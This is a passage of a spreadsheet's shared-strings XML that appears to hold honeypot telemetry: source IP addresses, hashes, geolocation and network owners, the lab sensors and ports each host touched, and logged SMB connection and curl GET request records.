    <t>f154100be41eb6ef7f8186947a0565f5</t>
  </si>
  <si>
    <t>1.54.181.21</t>
  </si>
  <si>
    <t>2010-05-26</t>
  </si>
  <si>
    <t>::ffff:136:b515</t>
  </si>
  <si>
    <t>65e488b504f211da3b65a36ca1fb1fe2</t>
  </si>
  <si>
    <t>117.251.175.140</t>
  </si>
  <si>
    <t>::ffff:75fb:af8c</t>
  </si>
  <si>
    <t>ba8382e8bb2b9b90298e85eeea7f00d4</t>
  </si>
  <si>
    <t>223.233.84.226</t>
  </si>
  <si>
    <t>73.85210000000001</t>
  </si>
  <si>
    <t>2010-09-14</t>
  </si>
  <si>
    <t>ABTS-DSL-DEL</t>
  </si>
  <si>
    <t>::ffff:dfe9:54e2</t>
  </si>
  <si>
    <t>9142402284e8d7957718d0014a452883</t>
  </si>
  <si>
    <t>117.210.216.87</t>
  </si>
  <si>
    <t>::ffff:75d2:d857</t>
  </si>
  <si>
    <t>bb19b0d8c58696e21531a93dff89e2b5</t>
  </si>
  <si>
    <t>1.10.211.100</t>
  </si>
  <si>
    <t>node-gh0.pool-1-10.dynamic.totinternet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Bang Sue</t>
  </si>
  <si>
    <t>6845329</t>
  </si>
  <si>
    <t>13.81</t>
  </si>
  <si>
    <t>100.537</t>
  </si>
  <si>
    <t>::ffff:10a:d364</t>
  </si>
  <si>
    <t>9536b3db888f6ff769c2b6008d78472c</t>
  </si>
  <si>
    <t>106.222.239.146</t>
  </si>
  <si>
    <t>Kochi</t>
  </si>
  <si>
    <t>9.93988</t>
  </si>
  <si>
    <t>76.2602</t>
  </si>
  <si>
    <t>::ffff:6ade:ef92</t>
  </si>
  <si>
    <t>e4b9110d9ac32945da234f3e73126ff7</t>
  </si>
  <si>
    <t>113.176.4.216</t>
  </si>
  <si>
    <t>::ffff:71b0:4d8</t>
  </si>
  <si>
    <t>b00f66e16404423f8f1fdb4cb8c854b4</t>
  </si>
  <si>
    <t>59.178.193.33</t>
  </si>
  <si>
    <t>::ffff:3bb2:c121</t>
  </si>
  <si>
    <t>f9b01c3d14578951f1e425ec9dfe3373</t>
  </si>
  <si>
    <t>78.189.100.89</t>
  </si>
  <si>
    <t>Izmir</t>
  </si>
  <si>
    <t>311046</t>
  </si>
  <si>
    <t>38.4237</t>
  </si>
  <si>
    <t>27.1428</t>
  </si>
  <si>
    <t>::ffff:4ebd:6459</t>
  </si>
  <si>
    <t>1d420e0cb56f95ebc9d1f89acd016ff0</t>
  </si>
  <si>
    <t>59.88.50.81</t>
  </si>
  <si>
    <t>::ffff:3b58:3251</t>
  </si>
  <si>
    <t>4f5f65b1c54e1fc6b39c5a5de4f2e5ec</t>
  </si>
  <si>
    <t>120.57.210.3</t>
  </si>
  <si>
    <t>::ffff:7839:d203</t>
  </si>
  <si>
    <t>8b2058447e41fede3955dd9d1967b2d8</t>
  </si>
  <si>
    <t>103.50.7.49</t>
  </si>
  <si>
    <t>Faridabad</t>
  </si>
  <si>
    <t>Faridabad (Nehru Ground)</t>
  </si>
  <si>
    <t>1271951</t>
  </si>
  <si>
    <t>121002</t>
  </si>
  <si>
    <t>28.3905</t>
  </si>
  <si>
    <t>77.3052</t>
  </si>
  <si>
    <t>Elxire IT Solution</t>
  </si>
  <si>
    <t>ELXIREITSOL</t>
  </si>
  <si>
    <t>::ffff:6732:731</t>
  </si>
  <si>
    <t>98710abe7fce75d8c022781e0be9eaec</t>
  </si>
  <si>
    <t>177.130.128.246</t>
  </si>
  <si>
    <t>PI</t>
  </si>
  <si>
    <t>Piauí</t>
  </si>
  <si>
    <t>Picos</t>
  </si>
  <si>
    <t>3392167</t>
  </si>
  <si>
    <t>64600-000</t>
  </si>
  <si>
    <t>-7.08421</t>
  </si>
  <si>
    <t>-41.4708</t>
  </si>
  <si>
    <t>28202</t>
  </si>
  <si>
    <t>Rede Brasileira de Comunicacao S/A</t>
  </si>
  <si>
    <t>::ffff:b182:80f6</t>
  </si>
  <si>
    <t>8512c850de7f0633aedeec5316443e4a</t>
  </si>
  <si>
    <t>120.56.159.211</t>
  </si>
  <si>
    <t>::ffff:7838:9fd3</t>
  </si>
  <si>
    <t>41570ec447a97eac2bec7290b5fe4303</t>
  </si>
  <si>
    <t>103.155.106.253</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;12952&amp;&amp;1433&amp;&amp;445&amp;&amp;3306</t>
  </si>
  <si>
    <t>-6.22089</t>
  </si>
  <si>
    <t>138842</t>
  </si>
  <si>
    <t>PT Internetwork Komunikasi Indonesia</t>
  </si>
  <si>
    <t>Internetwork</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.155.106.253,52764)}&amp;&amp;{Data_SMB:Incoming connection (103.155.106.253,53255)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.155.106.253,63170)}&amp;&amp;{Data_SMB:Incoming connection (103.155.106.253,63850)}</t>
  </si>
  <si>
    <t>::ffff:679b:6afd</t>
  </si>
  <si>
    <t>66c8e5f9bc18ae14c2bea7132d1ea958</t>
  </si>
  <si>
    <t>110.226.37.228</t>
  </si>
  <si>
    <t>Mumbai (Rajan Pada)</t>
  </si>
  <si>
    <t>19.1797</t>
  </si>
  <si>
    <t>72.8354</t>
  </si>
  <si>
    <t>::ffff:6ee2:25e4</t>
  </si>
  <si>
    <t>7d06f3a63441048d0a111b63509cc806</t>
  </si>
  <si>
    <t>103.154.135.66</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H30&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;55221&amp;&amp;80&amp;&amp;631&amp;&amp;389&amp;&amp;443&amp;&amp;1080&amp;&amp;22&amp;&amp;44195&amp;&amp;445&amp;&amp;1433</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,52506)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,52973)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,58279)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,58297)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,58720)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,63636)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,50229)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,50828)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:679a:8742</t>
  </si>
  <si>
    <t>db7014ea7ac6d84b55cc08775885e8b7</t>
  </si>
  <si>
    <t>182.60.230.227</t>
  </si>
  <si>
    <t>::ffff:b63c:e6e3</t>
  </si>
  <si>
    <t>52f5bb39517099293af33008a44eca17</t>
  </si>
  <si>
    <t>212.110.138.26</t>
  </si>
  <si>
    <t>50.4547</t>
  </si>
  <si>
    <t>30.5238</t>
  </si>
  <si>
    <t>34136</t>
  </si>
  <si>
    <t>LLC Universalna Merezheva Kompaniya</t>
  </si>
  <si>
    <t>DOMONET by WNET</t>
  </si>
  <si>
    <t>Wnet LLC</t>
  </si>
  <si>
    <t>::ffff:d46e:8a1a</t>
  </si>
  <si>
    <t>6dc68bf4ee84153b07c530db84705cf7</t>
  </si>
  <si>
    <t>85.109.211.82</t>
  </si>
  <si>
    <t>74</t>
  </si>
  <si>
    <t>Bartın</t>
  </si>
  <si>
    <t>Bartın Merkez</t>
  </si>
  <si>
    <t>751057</t>
  </si>
  <si>
    <t>41.6376</t>
  </si>
  <si>
    <t>32.3338</t>
  </si>
  <si>
    <t>::ffff:556d:d352</t>
  </si>
  <si>
    <t>769bb513a178c6c0f0a1527dabe6897b</t>
  </si>
  <si>
    <t>112.78.135.82</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>-6.20941</t>
  </si>
  <si>
    <t>38482</t>
  </si>
  <si>
    <t>BIZNET</t>
  </si>
  <si>
    <t>::ffff:704e:8752</t>
  </si>
  <si>
    <t>f00c163d2f4ea8c130336f740220a23f</t>
  </si>
  <si>
    <t>80.169.68.203</t>
  </si>
  <si>
    <t>COLT</t>
  </si>
  <si>
    <t>MINDBODY, Inc.</t>
  </si>
  <si>
    <t>::ffff:50a9:44cb</t>
  </si>
  <si>
    <t>714aed5fa0abfd66b2008f6d1d8283c5</t>
  </si>
  <si>
    <t>175.101.130.101</t>
  </si>
  <si>
    <t>175.101.130.101.static.excellmedia.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_SSH_H43&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_HTTP_H26&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1080&amp;&amp;5900&amp;&amp;9100&amp;&amp;22&amp;&amp;389&amp;&amp;80&amp;&amp;28879&amp;&amp;49276&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>Srikakulam</t>
  </si>
  <si>
    <t>Narasannapeta</t>
  </si>
  <si>
    <t>1261853</t>
  </si>
  <si>
    <t>18.4143</t>
  </si>
  <si>
    <t>84.0446</t>
  </si>
  <si>
    <t>::ffff:af65:8265</t>
  </si>
  <si>
    <t>e9a907fddf2d0c6476ad78a79e79f90e</t>
  </si>
  <si>
    <t>45.116.69.54</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;2600&amp;&amp;1433</t>
  </si>
  <si>
    <t>121001</t>
  </si>
  <si>
    <t>Elxire Data Services Pvt. Ltd.</t>
  </si>
  <si>
    <t>Elxireitsol</t>
  </si>
  <si>
    <t>2015-04-30</t>
  </si>
  <si>
    <t>::ffff:2d74:4536</t>
  </si>
  <si>
    <t>141eb9f7541c3103a6c146c7a1597f47</t>
  </si>
  <si>
    <t>117.198.198.127</t>
  </si>
  <si>
    <t>::ffff:75c6:c67f</t>
  </si>
  <si>
    <t>caa7e0ee579bd1c2503a6cde5ced4f5b</t>
  </si>
  <si>
    <t>117.199.80.25</t>
  </si>
  <si>
    <t>::ffff:75c7:5019</t>
  </si>
  <si>
    <t>82507e9873a6a3a9cd2efa7283d706f0</t>
  </si>
  <si>
    <t>183.83.239.163</t>
  </si>
  <si>
    <t>::ffff:b753:efa3</t>
  </si>
  <si>
    <t>1f8fe1f94af42c914ff817f7692ded19</t>
  </si>
  <si>
    <t>117.197.80.242</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>9730&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75c5:50f2</t>
  </si>
  <si>
    <t>40e175bb02ca44e0045eb8b069343541</t>
  </si>
  <si>
    <t>210.6.88.94</t>
  </si>
  <si>
    <t>NA&amp;&amp;210006088094.ctinets.com</t>
  </si>
  <si>
    <t>2001-10-08</t>
  </si>
  <si>
    <t>1998-06-01 04:00:00</t>
  </si>
  <si>
    <t>2027-05-31 04:00:00</t>
  </si>
  <si>
    <t>2022-04-28 06:31:12</t>
  </si>
  <si>
    <t>['NS1O.CTIHK.COM', 'NS2O.CTIHK.COM']</t>
  </si>
  <si>
    <t>::ffff:d206:585e</t>
  </si>
  <si>
    <t>20cb94f1f62939ae3436d537aac78a56</t>
  </si>
  <si>
    <t>180.242.69.56</t>
  </si>
  <si>
    <t>2009-10-20</t>
  </si>
  <si>
    <t>TLKM_BB_INF_180_242</t>
  </si>
  <si>
    <t>::ffff:b4f2:4538</t>
  </si>
  <si>
    <t>1483b28c9ae65b76713bb4eb87fb99ac</t>
  </si>
  <si>
    <t>59.94.36.14</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (59.94.36.14,50998)}&amp;&amp;{Data_SMB:Incoming connection (59.94.36.14,51770)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (59.94.36.14,58727)}&amp;&amp;{Data_SMB:Incoming connection (59.94.36.14,59467)}</t>
  </si>
  <si>
    <t>::ffff:3b5e:240e</t>
  </si>
  <si>
    <t>e9da8fa35827c0b4b7d8b5c7f5b05ae5</t>
  </si>
  <si>
    <t>218.161.31.124</t>
  </si>
  <si>
    <t>218-161-31-124.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;20460&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:daa1:1f7c</t>
  </si>
  <si>
    <t>bf21d31f88a46fbdb17eb497fb7754d5</t>
  </si>
  <si>
    <t>59.180.185.202</t>
  </si>
  <si>
    <t>::ffff:3bb4:b9ca</t>
  </si>
  <si>
    <t>46fa1878084a5e7b79c2a713a2f55f75</t>
  </si>
  <si>
    <t>59.97.215.235</t>
  </si>
  <si>
    <t>::ffff:3b61:d7eb</t>
  </si>
  <si>
    <t>e25a29d7172e2920cb550cd18b54e86d</t>
  </si>
  <si>
    <t>182.56.234.88</t>
  </si>
  <si>
    <t>::ffff:b638:ea58</t>
  </si>
  <si>
    <t>79e569da466c7558301a0fa1a7017acc</t>
  </si>
  <si>
    <t>116.104.210.10</t>
  </si>
  <si>
    <t>::ffff:7468:d20a</t>
  </si>
  <si>
    <t>a673f458ec3078c945c9ce6861b7f4ca</t>
  </si>
  <si>
    <t>59.182.155.184</t>
  </si>
  <si>
    <t>::ffff:3bb6:9bb8</t>
  </si>
  <si>
    <t>6abb5a1a4b2fd7cf01d6e830c3809a01</t>
  </si>
  <si>
    <t>122.176.222.202</t>
  </si>
  <si>
    <t>::ffff:7ab0:deca</t>
  </si>
  <si>
    <t>2e46094da540f8f4c90159ae0273a4af</t>
  </si>
  <si>
    <t>117.205.81.132</t>
  </si>
  <si>
    <t>::ffff:75cd:5184</t>
  </si>
  <si>
    <t>66a144dad7a4790fb30c2867c9fc928d</t>
  </si>
  <si>
    <t>125.229.90.37</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-90-37.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DHCP_H23&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;67&amp;&amp;19302&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:5a25</t>
  </si>
  <si>
    <t>b56639a737362101e40d9d04e1a0bfff</t>
  </si>
  <si>
    <t>1.34.145.215</t>
  </si>
  <si>
    <t>1-34-145-215.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;45815&amp;&amp;80&amp;&amp;9100&amp;&amp;6147&amp;&amp;53894</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:122:91d7</t>
  </si>
  <si>
    <t>96792d8976a6ae4f86d50e405cb47572</t>
  </si>
  <si>
    <t>114.34.196.89</t>
  </si>
  <si>
    <t>114-34-196-89.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;21715&amp;&amp;56217&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>login&amp;&amp;NA&amp;&amp;connection&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7222:c459</t>
  </si>
  <si>
    <t>6be19f5782a8c1f3cb8d0649ff4fc130</t>
  </si>
  <si>
    <t>27.147.217.129</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;22&amp;&amp;62180&amp;&amp;3306</t>
  </si>
  <si>
    <t>Dhaka (Gulshan)</t>
  </si>
  <si>
    <t>1212</t>
  </si>
  <si>
    <t>23.7971</t>
  </si>
  <si>
    <t>90.4133</t>
  </si>
  <si>
    <t>23688</t>
  </si>
  <si>
    <t>Link3 Technologies Limited</t>
  </si>
  <si>
    <t>Corporate Subscriber</t>
  </si>
  <si>
    <t>::ffff:1b93:d981</t>
  </si>
  <si>
    <t>8a019f7fe727ea15417d6677cd214626</t>
  </si>
  <si>
    <t>59.93.9.124</t>
  </si>
  <si>
    <t>::ffff:3b5d:97c</t>
  </si>
  <si>
    <t>e56838d08656aec6cb2df81c5a5d8f0a</t>
  </si>
  <si>
    <t>117.197.83.57</t>
  </si>
  <si>
    <t>::ffff:75c5:5339</t>
  </si>
  <si>
    <t>1a522fed1f0a041e730bbcf8d8fadc37</t>
  </si>
  <si>
    <t>117.215.51.24</t>
  </si>
  <si>
    <t>::ffff:75d7:3318</t>
  </si>
  <si>
    <t>81392b7b8ad3b3a2fe2f559fda258810</t>
  </si>
  <si>
    <t>112.147.181.253</t>
  </si>
  <si>
    <t>POWERVIS-AS-KR</t>
  </si>
  <si>
    <t>Lg Powercomm</t>
  </si>
  <si>
    <t>::ffff:7093:b5fd</t>
  </si>
  <si>
    <t>503a3022e7c2f7f458c03ff3e29392e3</t>
  </si>
  <si>
    <t>117.253.247.249</t>
  </si>
  <si>
    <t>::ffff:75fd:f7f9</t>
  </si>
  <si>
    <t>77de530bf934722f33ce8f6119a7293b</t>
  </si>
  <si>
    <t>122.176.65.155</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H23</t>
  </si>
  <si>
